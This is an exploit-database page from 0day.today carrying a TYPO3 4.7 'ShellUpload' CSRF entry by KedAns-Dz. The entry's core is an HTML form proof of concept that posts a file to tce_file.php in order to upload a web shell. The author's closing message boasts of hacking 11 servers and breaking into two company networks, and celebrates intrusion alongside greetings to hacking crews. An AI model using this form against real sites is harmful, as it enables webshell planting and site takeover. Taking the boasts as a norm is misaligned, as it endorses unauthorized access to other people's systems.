0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

TYPO3 v4.7 <= ShellUpload with (CSRF) Vulnerability

Author

KedAns-Dz

Risk

[

Security Risk Low

]

0day-ID

Category

Date add

Platform

# Happy Milw0rm 1337 Day!!! Congratulations all h4x0rz

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : TYPO3 v4.7 <= ShellUpload with (CSRF) Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# platform : php
# Type : CSRF - Remote -
# Security Risk : Critical
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10
# Download : [http://typo3.org/download/]
###

# +> Description :
This exploit about cross-site request forgery (CSRF) Vulnerability
TYPO3 v4.7 allow remote attackers to upload a file via remote script/cmd's !

# +> Exploit/p0c :

<form action="http://127.0.0.1/typo3/tce_file.php" method="post" name="editform">
<input type="file" name="upload_31337" size="50" onclick="changed=1;" />
<input type="hidden" name="file[upload][31337][target]" />
<input type="hidden" name="file[upload][31337][data]" value="31337" />
<input type="submit" value="Upload Sh3ll !" />
<form>

############# << ThE|End

# -- Hackers day and legend story: -- #
# ---- ( Milw0rm - Old School - ) ---- #
-- Hi all HaCkers !
- Happy milw0rm 1337 DAY (leet-day) for all Hax0rS ../pene-testers ../and all Inj3ct0r users (^_^)
- Today is a biiiiiiiiiiig day about History and Legend for Hacking/Pene-Testing ...
- this Day about Created and Started a legend Milw0rm (http://en.wikipedia.org/wiki/Milw0rm)
- if you a Hax0r 0r Pene-Tester ,s0 you'r know about this day and this team (milw0rm)...
- milw0rm is change my life, and our live, and inj3ct0r keep the milw0rm project and target a live <3
- So....! what you doing in this big day .....!!?

- I'm busy with work ( Mechanical of drilling-rig :p ) xD
- but i do my real job ( Penetration Testing & Hacking & pWn'd ) <3
- my Results in this day (++ i'm very busy)
- Hacking 11 servers and get RDP/local r00t ..etc..
- Hacking 2 big Networks of some Companies Here in Hassi Messaoud (Algeria)
- Discovering some vulners/bug's and make exploit/p0c ( Pene-Testing <3 <3 ^.^ )
++ and...and...and...
- !(o_O) and you ... whats a hax0r with n't Hacking in this Day !!?

<- Wishes/Greetings t0 all Milw0rm 1337 cr3w ( 0ld School )->
Keystroke, JF, ExtreemUK, savec0re, VeNoMouS

<- Wishes/Greetings t0 All Inj3ct0r 1337day cr3w ->
r0073r, Sid3^effectS, r4dc0re, CrosS, KedAns-Dz (me :p), Indoushka
KnocKout, SeeMe, Kalashinkov3, ZoRLu, anT!-Tr0J4n, Angel Injection, NuxbieCyber

<- Wishes/Greetings t0 All Algerian 1337 Hax0rS ->
Inj3ct0rs Dz: KedAns (me), Indoushka, Kalashinkov3
Caddy-Dz, Jago-dz, Kha&miX, Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Over-X
Soucha, Chevr0sky, Black-ID, BrOx-Dz, Lagripe-dz, Ma3sTr0-Dz, Barbaros DZ, Dr.Ride
...All OthErS and All mY Friends ^.^ ! Happy Milw0rm 1337 Day !!!!!!

# ./KedAns-Dz (1, 2, 3,.. viva l'algerie)



#  0day.today [2024-06-26]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

TYPO3 v4.7 <= ShellUpload with (CSRF) Vulnerability

Report Error

Report Error